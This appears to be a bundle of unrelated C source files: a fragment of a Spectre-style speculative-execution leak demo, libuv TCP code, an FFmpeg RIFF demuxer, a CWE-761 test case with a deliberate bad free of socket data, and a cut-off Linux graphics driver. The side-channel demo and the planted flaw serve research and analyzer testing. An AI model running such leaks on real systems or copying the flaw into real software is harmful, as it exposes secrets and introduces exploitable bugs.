malloc(pagesize * (256 + 4)); // page aligned mem = (char *)(((size_t)_mem & ~(pagesize-1)) + pagesize * 2); pid_t pid = fork(); // initialize memory memset(mem, pid, pagesize * 256); // store secret memset(data, ' ', sizeof(data)); memcpy(data, DATA_SECRET, sizeof(DATA_SECRET)); // ensure data terminates data[sizeof(data) / sizeof(data[0]) - 1] = '0'; // flush our shared memory flush_shared_memory(); // nothing leaked so far char leaked[sizeof(DATA_SECRET) + 1]; memset(leaked, ' ', sizeof(leaked)); leaked[sizeof(DATA_SECRET)] = 0; int j = 0; while(1) { // for every byte in the string j = (j + 1) % sizeof(DATA_SECRET); // mistrain with valid index if(pid == 0) { for(int y = 0; y < 10; y++) { access_array(0); } } else { // potential out-of-bounds access access_array(j); // only show inaccessible values (SECRET) if(j >= sizeof(DATA) - 1) { mfence(); // avoid speculation cache_decode_pretty(leaked, j); } if(!strncmp(leaked + sizeof(DATA) - 1, SECRET, sizeof(SECRET) - 1)) break; sched_yield(); } } printf("\n\x1b[1A[ ]\n\n[\x1b[32m>\x1b[0m] Done\n"); }
549213.c
/* Copyright Joyent, Inc. and other Node contributors. All rights reserved. * * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the "Software"), to * deal in the Software without restriction, including without limitation the * rights to use, copy, modify, merge, publish, distribute, sublicense, and/or * sell copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in * all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING * FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS * IN THE SOFTWARE. */ #include "../../include/uv.h" #include "internal.h" #include <stdlib.h> #include <unistd.h> #include <assert.h> #include <errno.h> static int maybe_new_socket(uv_tcp_t* handle, int domain, int flags) { int sockfd; int err; if (domain == AF_UNSPEC || uv__stream_fd(handle) != -1) { handle->flags |= flags; return 0; } err = uv__socket(domain, SOCK_STREAM, 0); if (err < 0) return err; sockfd = err; err = uv__stream_open((uv_stream_t*) handle, sockfd, flags); if (err) { uv__close(sockfd); return err; } return 0; } int uv_tcp_init_ex(uv_loop_t* loop, uv_tcp_t* tcp, unsigned int flags) { int domain; /* Use the lower 8 bits for the domain */ domain = flags & 0xFF; if (domain != AF_INET && domain != AF_INET6 && domain != AF_UNSPEC) return -EINVAL; if (flags & ~0xFF) return -EINVAL; uv__stream_init(loop, (uv_stream_t*)tcp, UV_TCP); /* If anything fails beyond this point we need to remove the handle from * the handle queue, since it was added by uv__handle_init in uv_stream_init. */ if (domain != AF_UNSPEC) { int err = maybe_new_socket(tcp, domain, 0); if (err) { QUEUE_REMOVE(&tcp->handle_queue); return err; } } return 0; } int uv_tcp_init(uv_loop_t* loop, uv_tcp_t* tcp) { return uv_tcp_init_ex(loop, tcp, AF_UNSPEC); } int uv__tcp_bind(uv_tcp_t* tcp, const struct sockaddr* addr, unsigned int addrlen, unsigned int flags) { int err; int on; /* Cannot set IPv6-only mode on non-IPv6 socket. */ if ((flags & UV_TCP_IPV6ONLY) && addr->sa_family != AF_INET6) return -EINVAL; err = maybe_new_socket(tcp, addr->sa_family, UV_STREAM_READABLE | UV_STREAM_WRITABLE); if (err) return err; on = 1; if (setsockopt(tcp->io_watcher.fd, SOL_SOCKET, SO_REUSEADDR, &on, sizeof(on))) return -errno; #ifdef IPV6_V6ONLY if (addr->sa_family == AF_INET6) { on = (flags & UV_TCP_IPV6ONLY) != 0; if (setsockopt(tcp->io_watcher.fd, IPPROTO_IPV6, IPV6_V6ONLY, &on, sizeof on) == -1) { #if defined(__MVS__) if (errno == EOPNOTSUPP) return -EINVAL; #endif return -errno; } } #endif errno = 0; if (bind(tcp->io_watcher.fd, addr, addrlen) && errno != EADDRINUSE) { if (errno == EAFNOSUPPORT) /* OSX, other BSDs and SunoS fail with EAFNOSUPPORT when binding a * socket created with AF_INET to an AF_INET6 address or vice versa. */ return -EINVAL; return -errno; } tcp->delayed_error = -errno; tcp->flags |= UV_HANDLE_BOUND; if (addr->sa_family == AF_INET6) tcp->flags |= UV_HANDLE_IPV6; return 0; } int uv__tcp_connect(uv_connect_t* req, uv_tcp_t* handle, const struct sockaddr* addr, unsigned int addrlen, uv_connect_cb cb) { int err; int r; assert(handle->type == UV_TCP); if (handle->connect_req != NULL) return -EALREADY; /* FIXME(bnoordhuis) -EINVAL or maybe -EBUSY. */ err = maybe_new_socket(handle, addr->sa_family, UV_STREAM_READABLE | UV_STREAM_WRITABLE); if (err) return err; handle->delayed_error = 0; do { errno = 0; r = connect(uv__stream_fd(handle), addr, addrlen); } while (r == -1 && errno == EINTR); /* We not only check the return value, but also check the errno != 0. * Because in rare cases connect() will return -1 but the errno * is 0 (for example, on Android 4.3, OnePlus phone A0001_12_150227) * and actually the tcp three-way handshake is completed. */ if (r == -1 && errno != 0) { if (errno == EINPROGRESS) ; /* not an error */ else if (errno == ECONNREFUSED) /* If we get a ECONNREFUSED wait until the next tick to report the * error. Solaris wants to report immediately--other unixes want to * wait. */ handle->delayed_error = -errno; else return -errno; } uv__req_init(handle->loop, req, UV_CONNECT); req->cb = cb; req->handle = (uv_stream_t*) handle; QUEUE_INIT(&req->queue); handle->connect_req = req; uv__io_start(handle->loop, &handle->io_watcher, POLLOUT); if (handle->delayed_error) uv__io_feed(handle->loop, &handle->io_watcher); return 0; } int uv_tcp_open(uv_tcp_t* handle, uv_os_sock_t sock) { int err; err = uv__nonblock(sock, 1); if (err) return err; return uv__stream_open((uv_stream_t*)handle, sock, UV_STREAM_READABLE | UV_STREAM_WRITABLE); } int uv_tcp_getsockname(const uv_tcp_t* handle, struct sockaddr* name, int* namelen) { socklen_t socklen; if (handle->delayed_error) return handle->delayed_error; if (uv__stream_fd(handle) < 0) return -EINVAL; /* FIXME(bnoordhuis) -EBADF */ /* sizeof(socklen_t) != sizeof(int) on some systems. */ socklen = (socklen_t) *namelen; if (getsockname(uv__stream_fd(handle), name, &socklen)) return -errno; *namelen = (int) socklen; return 0; } int uv_tcp_getpeername(const uv_tcp_t* handle, struct sockaddr* name, int* namelen) { socklen_t socklen; if (handle->delayed_error) return handle->delayed_error; if (uv__stream_fd(handle) < 0) return -EINVAL; /* FIXME(bnoordhuis) -EBADF */ /* sizeof(socklen_t) != sizeof(int) on some systems. */ socklen = (socklen_t) *namelen; if (getpeername(uv__stream_fd(handle), name, &socklen)) return -errno; *namelen = (int) socklen; return 0; } int uv_tcp_listen(uv_tcp_t* tcp, int backlog, uv_connection_cb cb) { static int single_accept = -1; int err; if (tcp->delayed_error) return tcp->delayed_error; if (single_accept == -1) { const char* val = getenv("UV_TCP_SINGLE_ACCEPT"); single_accept = (val != NULL && atoi(val) != 0); /* Off by default. */ } if (single_accept) tcp->flags |= UV_TCP_SINGLE_ACCEPT; err = maybe_new_socket(tcp, AF_INET, UV_STREAM_READABLE); if (err) return err; #ifdef __MVS__ /* on zOS the listen call does not bind automatically if the socket is unbound. Hence the manual binding to an arbitrary port is required to be done manually */ if (!(tcp->flags & UV_HANDLE_BOUND)) { struct sockaddr_storage saddr; socklen_t slen = sizeof(saddr); memset(&saddr, 0, sizeof(saddr)); if (getsockname(tcp->io_watcher.fd, (struct sockaddr*) &saddr, &slen)) return -errno; if (bind(tcp->io_watcher.fd, (struct sockaddr*) &saddr, slen)) return -errno; tcp->flags |= UV_HANDLE_BOUND; } #endif if (listen(tcp->io_watcher.fd, backlog)) return -errno; tcp->connection_cb = cb; tcp->flags |= UV_HANDLE_BOUND; /* Start listening for connections. */ tcp->io_watcher.cb = uv__server_io; uv__io_start(tcp->loop, &tcp->io_watcher, POLLIN); return 0; } int uv__tcp_nodelay(int fd, int on) { if (setsockopt(fd, IPPROTO_TCP, TCP_NODELAY, &on, sizeof(on))) return -errno; return 0; } int uv__tcp_keepalive(int fd, int on, unsigned int delay) { if (setsockopt(fd, SOL_SOCKET, SO_KEEPALIVE, &on, sizeof(on))) return -errno; #ifdef TCP_KEEPIDLE if (on && setsockopt(fd, IPPROTO_TCP, TCP_KEEPIDLE, &delay, sizeof(delay))) return -errno; #endif /* Solaris/SmartOS, if you don't support keep-alive, * then don't advertise it in your system headers... */ /* FIXME(bnoordhuis) That's possibly because sizeof(delay) should be 1. */ #if defined(TCP_KEEPALIVE) && !defined(__sun) if (on && setsockopt(fd, IPPROTO_TCP, TCP_KEEPALIVE, &delay, sizeof(delay))) return -errno; #endif return 0; } int uv_tcp_nodelay(uv_tcp_t* handle, int on) { int err; if (uv__stream_fd(handle) != -1) { err = uv__tcp_nodelay(uv__stream_fd(handle), on); if (err) return err; } if (on) handle->flags |= UV_TCP_NODELAY; else handle->flags &= ~UV_TCP_NODELAY; return 0; } int uv_tcp_keepalive(uv_tcp_t* handle, int on, unsigned int delay) { int err; if (uv__stream_fd(handle) != -1) { err =uv__tcp_keepalive(uv__stream_fd(handle), on, delay); if (err) return err; } if (on) handle->flags |= UV_TCP_KEEPALIVE; else handle->flags &= ~UV_TCP_KEEPALIVE; /* TODO Store delay if uv__stream_fd(handle) == -1 but don't want to enlarge * uv_tcp_t with an int that's almost never used... */ return 0; } int uv_tcp_simultaneous_accepts(uv_tcp_t* handle, int enable) { if (enable) handle->flags &= ~UV_TCP_SINGLE_ACCEPT; else handle->flags |= UV_TCP_SINGLE_ACCEPT; return 0; } void uv__tcp_close(uv_tcp_t* handle) { uv__stream_close((uv_stream_t*)handle); }
19525.c
/* * RIFF demuxing functions and data * Copyright (c) 2000 Fabrice Bellard * * This file is part of FFmpeg. * * FFmpeg is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2.1 of the License, or (at your option) any later version. * * FFmpeg is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with FFmpeg; if not, write to the Free Software * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA */ #include "libavutil/dict.h" #include "libavutil/error.h" #include "libavutil/log.h" #include "libavutil/mathematics.h" #include "libavcodec/avcodec.h" #include "libavcodec/bytestream.h" #include "avformat.h" #include "avio_internal.h" #include "riff.h" int ff_get_guid(AVIOContext *s, ff_asf_guid *g) { int ret; av_assert0(sizeof(*g) == 16); //compiler will optimize this out ret = avio_read(s, *g, sizeof(*g)); if (ret < (int)sizeof(*g)) { memset(*g, 0, sizeof(*g)); return ret < 0 ? ret : AVERROR_INVALIDDATA; } return 0; } enum AVCodecID ff_codec_guid_get_id(const AVCodecGuid *guids, ff_asf_guid guid) { int i; for (i = 0; guids[i].id != AV_CODEC_ID_NONE; i++) if (!ff_guidcmp(guids[i].guid, guid)) return guids[i].id; return AV_CODEC_ID_NONE; } /* We could be given one of the three possible structures here: * WAVEFORMAT, PCMWAVEFORMAT or WAVEFORMATEX. Each structure * is an expansion of the previous one with the fields added * at the bottom. PCMWAVEFORMAT adds 'WORD wBitsPerSample' and * WAVEFORMATEX adds 'WORD cbSize' and basically makes itself * an openended structure. */ static void parse_waveformatex(AVFormatContext *s, AVIOContext *pb, AVCodecParameters *par) { ff_asf_guid subformat; int bps; bps = avio_rl16(pb); if (bps) par->bits_per_coded_sample = bps; par->channel_layout = avio_rl32(pb); /* dwChannelMask */ ff_get_guid(pb, &subformat); if (!memcmp(subformat + 4, (const uint8_t[]){ FF_AMBISONIC_BASE_GUID }, 12) || !memcmp(subformat + 4, (const uint8_t[]){ FF_BROKEN_BASE_GUID }, 12) || !memcmp(subformat + 4, (const uint8_t[]){ FF_MEDIASUBTYPE_BASE_GUID }, 12)) { par->codec_tag = AV_RL32(subformat); par->codec_id = ff_wav_codec_get_id(par->codec_tag, par->bits_per_coded_sample); } else { par->codec_id = ff_codec_guid_get_id(ff_codec_wav_guids, subformat); if (!par->codec_id) av_log(s, AV_LOG_WARNING, "unknown subformat:"FF_PRI_GUID"\n", FF_ARG_GUID(subformat)); } } /* "big_endian" values are needed for RIFX file format */ int ff_get_wav_header(AVFormatContext *s, AVIOContext *pb, AVCodecParameters *par, int size, int big_endian) { int id; uint64_t bitrate = 0; if (size < 14) { avpriv_request_sample(s, "wav header size < 14"); avio_skip(pb, size); return 0; } par->codec_type = AVMEDIA_TYPE_AUDIO; if (!big_endian) { id = avio_rl16(pb); if (id != 0x0165) { par->channels = avio_rl16(pb); par->sample_rate = avio_rl32(pb); bitrate = avio_rl32(pb) * 8LL; par->block_align = avio_rl16(pb); } } else { id = avio_rb16(pb); par->channels = avio_rb16(pb); par->sample_rate = avio_rb32(pb); bitrate = avio_rb32(pb) * 8LL; par->block_align = avio_rb16(pb); } if (size == 14) { /* We're dealing with plain vanilla WAVEFORMAT */ par->bits_per_coded_sample = 8; } else { if (!big_endian) { par->bits_per_coded_sample = avio_rl16(pb); } else { par->bits_per_coded_sample = avio_rb16(pb); } } if (id == 0xFFFE) { par->codec_tag = 0; } else { par->codec_tag = id; par->codec_id = ff_wav_codec_get_id(id, par->bits_per_coded_sample); } if (size >= 18 && id != 0x0165) { /* We're obviously dealing with WAVEFORMATEX */ int cbSize = avio_rl16(pb); /* cbSize */ if (big_endian) { avpriv_report_missing_feature(s, "WAVEFORMATEX support for RIFX files"); return AVERROR_PATCHWELCOME; } size -= 18; cbSize = FFMIN(size, cbSize); if (cbSize >= 22 && id == 0xfffe) { /* WAVEFORMATEXTENSIBLE */ parse_waveformatex(s, pb, par); cbSize -= 22; size -= 22; } if (cbSize > 0) { av_freep(&par->extradata); if (ff_get_extradata(s, par, pb, cbSize) < 0) return AVERROR(ENOMEM); size -= cbSize; } /* It is possible for the chunk to contain garbage at the end */ if (size > 0) avio_skip(pb, size); } else if (id == 0x0165 && size >= 32) { int nb_streams, i; size -= 4; av_freep(&par->extradata); if (ff_get_extradata(s, par, pb, size) < 0) return AVERROR(ENOMEM); nb_streams = AV_RL16(par->extradata + 4); par->sample_rate = AV_RL32(par->extradata + 12); par->channels = 0; bitrate = 0; if (size < 8 + nb_streams * 20) return AVERROR_INVALIDDATA; for (i = 0; i < nb_streams; i++) par->channels += par->extradata[8 + i * 20 + 17]; } par->bit_rate = bitrate; if (par->sample_rate <= 0) { av_log(s, AV_LOG_ERROR, "Invalid sample rate: %d\n", par->sample_rate); return AVERROR_INVALIDDATA; } if (par->codec_id == AV_CODEC_ID_AAC_LATM) { /* Channels and sample_rate values are those prior to applying SBR * and/or PS. */ par->channels = 0; par->sample_rate = 0; } /* override bits_per_coded_sample for G.726 */ if (par->codec_id == AV_CODEC_ID_ADPCM_G726 && par->sample_rate) par->bits_per_coded_sample = par->bit_rate / par->sample_rate; return 0; } enum AVCodecID ff_wav_codec_get_id(unsigned int tag, int bps) { enum AVCodecID id; id = ff_codec_get_id(ff_codec_wav_tags, tag); if (id <= 0) return id; if (id == AV_CODEC_ID_PCM_S16LE) id = ff_get_pcm_codec_id(bps, 0, 0, ~1); else if (id == AV_CODEC_ID_PCM_F32LE) id = ff_get_pcm_codec_id(bps, 1, 0, 0); if (id == AV_CODEC_ID_ADPCM_IMA_WAV && bps == 8) id = AV_CODEC_ID_PCM_ZORK; return id; } int ff_get_bmp_header(AVIOContext *pb, AVStream *st, uint32_t *size) { int tag1; uint32_t size_ = avio_rl32(pb); if (size) *size = size_; st->codecpar->width = avio_rl32(pb); st->codecpar->height = (int32_t)avio_rl32(pb); avio_rl16(pb); /* planes */ st->codecpar->bits_per_coded_sample = avio_rl16(pb); /* depth */ tag1 = avio_rl32(pb); avio_rl32(pb); /* ImageSize */ avio_rl32(pb); /* XPelsPerMeter */ avio_rl32(pb); /* YPelsPerMeter */ avio_rl32(pb); /* ClrUsed */ avio_rl32(pb); /* ClrImportant */ return tag1; } int ff_read_riff_info(AVFormatContext *s, int64_t size) { int64_t start, end, cur; AVIOContext *pb = s->pb; start = avio_tell(pb); end = start + size; while ((cur = avio_tell(pb)) >= 0 && cur <= end - 8 /* = tag + size */) { uint32_t chunk_code; int64_t chunk_size; char key[5] = { 0 }; char *value; chunk_code = avio_rl32(pb); chunk_size = avio_rl32(pb); if (avio_feof(pb)) { if (chunk_code || chunk_size) { av_log(s, AV_LOG_WARNING, "INFO subchunk truncated\n"); return AVERROR_INVALIDDATA; } return AVERROR_EOF; } if (chunk_size > end || end - chunk_size < cur || chunk_size == UINT_MAX) { avio_seek(pb, -9, SEEK_CUR); chunk_code = avio_rl32(pb); chunk_size = avio_rl32(pb); if (chunk_size > end || end - chunk_size < cur || chunk_size == UINT_MAX) { av_log(s, AV_LOG_WARNING, "too big INFO subchunk\n"); return AVERROR_INVALIDDATA; } } chunk_size += (chunk_size & 1); if (!chunk_code) { if (chunk_size) avio_skip(pb, chunk_size); else if (pb->eof_reached) { av_log(s, AV_LOG_WARNING, "truncated file\n"); return AVERROR_EOF; } continue; } value = av_mallocz(chunk_size + 1); if (!value) { av_log(s, AV_LOG_ERROR, "out of memory, unable to read INFO tag\n"); return AVERROR(ENOMEM); } AV_WL32(key, chunk_code); // Work around VC++ 2015 Update 1 code-gen bug: // https://connect.microsoft.com/VisualStudio/feedback/details/2291638 key[4] = 0; if (avio_read(pb, value, chunk_size) != chunk_size) { av_log(s, AV_LOG_WARNING, "premature end of file while reading INFO tag\n"); } av_dict_set(&s->metadata, key, value, AV_DICT_DONT_STRDUP_VAL); } return 0; }
280490.c
/* TEMPLATE GENERATED TESTCASE FILE Filename: CWE761_Free_Pointer_Not_At_Start_Of_Buffer__char_listen_socket_41.c Label Definition File: CWE761_Free_Pointer_Not_At_Start_Of_Buffer.label.xml Template File: source-sinks-41.tmpl.c */ /* * @description * CWE: 761 Free Pointer Not At Start of Buffer * BadSource: listen_socket Read data using a listen socket (server side) * Sinks: * GoodSink: free() memory correctly at the start of the buffer * BadSink : free() memory not at the start of the buffer * Flow Variant: 41 Data flow: data passed as an argument from one function to another in the same source file * * */ #include "std_testcase.h" #include <wchar.h> #define SEARCH_CHAR 'S' #define BAD_SRC_FIXED "Fixed String" /* MAINTENANCE NOTE: This string must contain the SEARCH_CHAR */ #ifdef _WIN32 # include <winsock2.h> # include <windows.h> # include <direct.h> # define PATH_SZ 100 # pragma comment(lib, "ws2_32") /* include ws2_32.lib when linking */ # define CLOSE_SOCKET closesocket #else # define PATH_SZ PATH_MAX # define INVALID_SOCKET -1 # define SOCKET_ERROR -1 # define CLOSE_SOCKET close # define SOCKET int #endif #define TCP_PORT 27015 #define LISTEN_BACKLOG 5 #ifndef OMITBAD static void bad_sink(char * data) { /* FLAW: We are incrementing the pointer in the loop - this will cause us to free the * memory block not at the start of the buffer */ for (; *data != '\0'; data++) { if (*data == SEARCH_CHAR) { printLine("We have a match!"); break; } } free(data); } void CWE761_Free_Pointer_Not_At_Start_Of_Buffer__char_listen_socket_41_bad() { char * data; data = (char *)malloc(100*sizeof(char)); data[0] = '\0'; { #ifdef _WIN32 WSADATA wsa_data; int wsa_data_init = 0; #endif int recv_rv; struct sockaddr_in s_in; char *replace; SOCKET listen_socket = INVALID_SOCKET; SOCKET accept_socket = INVALID_SOCKET; size_t data_len = strlen(data); do { #ifdef _WIN32 if (WSAStartup(MAKEWORD(2,2), &wsa_data) != NO_ERROR) break; wsa_data_init = 1; #endif listen_socket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); if (listen_socket == INVALID_SOCKET) break; memset(&s_in, 0, sizeof(s_in)); s_in.sin_family = AF_INET; s_in.sin_addr.s_addr = INADDR_ANY; s_in.sin_port = htons(TCP_PORT); if (bind(listen_socket, (struct sockaddr*)&s_in, sizeof(s_in)) == SOCKET_ERROR) break; if (listen(listen_socket, LISTEN_BACKLOG) == SOCKET_ERROR) break; accept_socket = accept(listen_socket, NULL, NULL); if (accept_socket == SOCKET_ERROR) break; /* Abort on error or the connection was closed */ recv_rv = recv(accept_socket, (char *)data+data_len, (int)(100-data_len-1), 0); if (recv_rv == SOCKET_ERROR || recv_rv == 0) break; /* Append null terminator */ data[recv_rv] = '\0'; /* Eliminate CRLF */ replace = strchr(data, '\r'); if (replace) *replace = '\0'; replace = strchr(data, '\n'); if (replace) *replace = '\0'; } while (0); if (listen_socket != INVALID_SOCKET) CLOSE_SOCKET(listen_socket); if (accept_socket != INVALID_SOCKET) CLOSE_SOCKET(accept_socket); #ifdef _WIN32 if (wsa_data_init) WSACleanup(); #endif } bad_sink(data); } #endif /* OMITBAD */ #ifndef OMITGOOD static void goodB2G_sink(char * data) { { size_t i; /* FIX: Use a loop variable to traverse through the string pointed to by data */ for (i=0; i < strlen(data); i++) { if (data[i] == SEARCH_CHAR) { printLine("We have a match!"); break; } } free(data); } } /* goodB2G uses the BadSource with the GoodSink */ static void goodB2G() { char * data; data = (char *)malloc(100*sizeof(char)); data[0] = '\0'; { #ifdef _WIN32 WSADATA wsa_data; int wsa_data_init = 0; #endif int recv_rv; struct sockaddr_in s_in; char *replace; SOCKET listen_socket = INVALID_SOCKET; SOCKET accept_socket = INVALID_SOCKET; size_t data_len = strlen(data); do { #ifdef _WIN32 if (WSAStartup(MAKEWORD(2,2), &wsa_data) != NO_ERROR) break; wsa_data_init = 1; #endif listen_socket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); if (listen_socket == INVALID_SOCKET) break; memset(&s_in, 0, sizeof(s_in)); s_in.sin_family = AF_INET; s_in.sin_addr.s_addr = INADDR_ANY; s_in.sin_port = htons(TCP_PORT); if (bind(listen_socket, (struct sockaddr*)&s_in, sizeof(s_in)) == SOCKET_ERROR) break; if (listen(listen_socket, LISTEN_BACKLOG) == SOCKET_ERROR) break; accept_socket = accept(listen_socket, NULL, NULL); if (accept_socket == SOCKET_ERROR) break; /* Abort on error or the connection was closed */ recv_rv = recv(accept_socket, (char *)data+data_len, (int)(100-data_len-1), 0); if (recv_rv == SOCKET_ERROR || recv_rv == 0) break; /* Append null terminator */ data[recv_rv] = '\0'; /* Eliminate CRLF */ replace = strchr(data, '\r'); if (replace) *replace = '\0'; replace = strchr(data, '\n'); if (replace) *replace = '\0'; } while (0); if (listen_socket != INVALID_SOCKET) CLOSE_SOCKET(listen_socket); if (accept_socket != INVALID_SOCKET) CLOSE_SOCKET(accept_socket); #ifdef _WIN32 if (wsa_data_init) WSACleanup(); #endif } goodB2G_sink(data); } void CWE761_Free_Pointer_Not_At_Start_Of_Buffer__char_listen_socket_41_good() { goodB2G(); } #endif /* OMITGOOD */ /* Below is the main(). It is only used when building this testcase on its own for testing or for building a binary to use in testing binary analysis tools. It is not used when compiling all the testcases as one application, which is how source code analysis tools are tested. */ #ifdef INCLUDEMAIN int main(int argc, char * argv[]) { /* seed randomness */ srand( (unsigned)time(NULL) ); #ifndef OMITGOOD printLine("Calling good()..."); CWE761_Free_Pointer_Not_At_Start_Of_Buffer__char_listen_socket_41_good(); printLine("Finished good()"); #endif /* OMITGOOD */ #ifndef OMITBAD printLine("Calling bad()..."); CWE761_Free_Pointer_Not_At_Start_Of_Buffer__char_listen_socket_41_bad(); printLine("Finished bad()"); #endif /* OMITBAD */ return 0; } #endif
709041.c
// SPDX-License-Identifier: GPL-2.0-only /* * Copyright 2010 Matt Turner. * Copyright 2012 Red Hat * * Authors: Matthew Garrett * Matt Turner * Dave Airlie */ #include <linux/delay.h> #include <drm/drm_atomic_helper.h> #include <drm/drm_atomic_state_helper.h> #include <drm/drm_crtc_helper.h> #include <drm/drm_damage_helper.h> #include <drm/drm_format_helper.h> #include <drm/drm_fourcc.h> #include <drm/drm_gem_framebuffer_helper.h> #include <drm/drm_plane_helper.h> #include <drm/drm_print.h> #include <drm/drm_probe_helper.h> #include <drm/drm_simple_kms_helper.h> #include "mgag200_drv.h" #define MGAG200_LUT_SIZE 256 /* * This file contains setup code for the CRTC. */ static void mga_crtc_load_lut(struct drm_crtc *crtc) { struct drm_device *dev = crtc->dev; struct mga_device *mdev = to_mga_device(dev); struct drm_framebuffer *fb; u16 *r_ptr, *g_ptr, *b_ptr; int i; if (!crtc->enabled) return; if (!mdev->display_pipe.plane.state) return; fb = mdev->display_pipe.plane.state->fb; r_ptr = crtc->gamma_store; g_ptr = r_ptr + crtc->gamma_size; b_ptr = g_ptr + crtc->gamma_size; WREG8(DAC_INDEX + MGA1064_INDEX, 0); if (fb && fb->format->cpp[0] * 8 == 16) { int inc = (fb->format->depth == 15) ? 8 : 4; u8 r, b; for (i = 0; i < MGAG200_LUT_SIZE; i += inc) { if (fb->format->depth == 16) { if (i > (MGAG200_LUT_SIZE >> 1)) { r = b = 0; } else { r = *r_ptr++ >> 8; b = *b_ptr++ >> 8; r_ptr++; b_ptr++; } } else { r = *r_ptr++ >> 8; b = *b_ptr++ >> 8; } /* VGA registers */ WREG8(DAC_INDEX + MGA1064_COL_PAL, r); WREG8(DAC_INDEX + MGA1064_COL_PAL, *g_ptr++ >> 8); WREG8(DAC_INDEX + MGA1064_COL_PAL, b); } return; } for (i = 0; i < MGAG200_LUT_SIZE; i++) { /* VGA registers */ WREG8(DAC_INDEX + MGA1064_COL_PAL, *r_ptr++ >> 8); WREG8(DAC_INDEX + MGA1064_COL_PAL, *g_ptr++ >> 8); WREG8(DAC_INDEX + MGA1064_COL_PAL, *b_ptr++ >> 8); } } static inline void mga_wait_vsync(struct mga_device *mdev) { unsigned long timeout = jiffies + HZ/10; unsigned int status = 0; do { status = RREG32(MGAREG_Status); } while ((status & 0x08) && time_before(jiffies, timeout)); timeout = jiffies + HZ/10; status = 0; do { status = RREG32(MGAREG_Status); } while (!(status & 0x08) && time_before(jiffies, timeout)); } static inline void mga_wait_busy(struct mga_device *mdev) { unsigned long timeout = jiffies + HZ; unsigned int status = 0; do { status = RREG8(MGAREG_Status + 2); } while ((status & 0x01) && time_before(jiffies, timeout)); } /* * PLL setup */ static int mgag200_g200_set_plls(struct mga_device *mdev, long clock) { struct drm_device *dev = &mdev->base; const int post_div_max = 7; const int in_div_min = 1; const int in_div_max = 6; const int feed_div_min = 7; const int feed_div_max = 127; u8 testm, testn; u8 n = 0, m = 0, p, s; long f_vco; long computed; long delta, tmp_delta; long ref_clk = mdev->model.g200.ref_clk; long p_clk_min = mdev->model.g200.pclk_min; long p_clk_max = mdev->model.g200.pclk_max; if (clock > p_clk_max) { drm_err(dev, "Pixel Clock %ld too high\n", clock); return 1; } if (clock < p_clk_min >> 3) clock = p_clk_min >> 3; f_vco = clock; for (p = 0; p <= post_div_max && f_vco < p_clk_min; p = (p << 1) + 1, f_vco <<= 1) ; delta = clock; for (testm = in_div_min; testm <= in_div_max; testm++) { for (testn = feed_div_min; testn <= feed_div_max; testn++) { computed = ref_clk * (testn + 1) / (testm + 1); if (computed < f_vco) tmp_delta = f_vco - computed; else tmp_delta = computed - f_vco; if (tmp_delta < delta) { delta = tmp_delta; m = testm; n = testn; } } } f_vco = ref_clk * (n + 1) / (m + 1); if (f_vco < 100000) s = 0; else if (f_vco < 140000) s = 1; else if (f_vco < 180000) s = 2; else s = 3; drm_dbg_kms(dev, "clock: %ld vco: %ld m: %d n: %d p: %d s: %d\n", clock, f_vco, m, n, p, s); WREG_MISC_MASKED(MGAREG_MISC_CLKSEL_MGA, MGAREG_MISC_CLKSEL_MASK); WREG_DAC(MGA1064_PIX_PLLC_M, m); WREG_DAC(MGA1064_PIX_PLLC_N, n); WREG_DAC(MGA1064_PIX_PLLC_P, (p | (s << 3))); return 0; } #define P_ARRAY_SIZE 9 static int mga_g200se_set_plls(struct mga_device *mdev, long clock) { u32 unique_rev_id = mdev->model.g200se.unique_rev_id; unsigned int vcomax, vcomin, pllreffreq; unsigned int delta, tmpdelta, permitteddelta; unsigned int testp, testm, testn; unsigned int p, m, n; unsigned int computed; unsigned int pvalues_e4[P_ARRAY_SIZE] = {16, 14, 12, 10, 8, 6, 4, 2, 1}; unsigned int fvv; unsigned int i; if (unique_rev_id <= 0x03) { m = n = p = 0; vcomax = 320000; vcomin = 160000; pllreffreq = 25000; delta = 0xffffffff; permitteddelta = clock * 5 / 1000; for (testp = 8; testp > 0; testp /= 2) { if (clock * testp > vcomax) continue; if (clock * testp < vcomin) continue; for (testn = 17; testn < 256; testn++) { for (testm = 1; testm < 32; testm++) { computed = (pllreffreq * testn) / (testm * testp); if (computed > clock) tmpdelta = computed - clock; else tmpdelta = clock - computed; if (tmpdelta < delta) { delta = tmpdelta; m = testm - 1; n = testn - 1; p = testp - 1; } } } } } else { m = n = p = 0; vcomax = 1600000; vcomin = 800000; pllreffreq = 25000; if (clock < 25000) clock = 25000; clock = clock * 2; delta = 0xFFFFFFFF; /* Permited delta is 0.5% as VESA Specification */ permitteddelta = clock * 5 / 1000; for (i = 0 ; i < P_ARRAY_SIZE ; i++) { testp = pvalues_e4[i]; if ((clock * testp) > vcomax) continue; if ((clock * testp) < vcomin) continue; for (testn = 50; testn <= 256; testn++) { for (testm = 1; testm <= 32; testm++) { computed = (pllreffreq * testn) / (testm * testp); if (computed > clock) tmpdelta = computed - clock; else tmpdelta = clock - computed; if (tmpdelta < delta) { delta = tmpdelta; m = testm - 1; n = testn - 1; p = testp - 1; } } } } fvv = pllreffreq * (n + 1) / (m + 1); fvv = (fvv - 800000) / 50000; if (fvv > 15) fvv = 15; p |= (fvv << 4); m |= 0x80; clock = clock / 2; } if (delta > 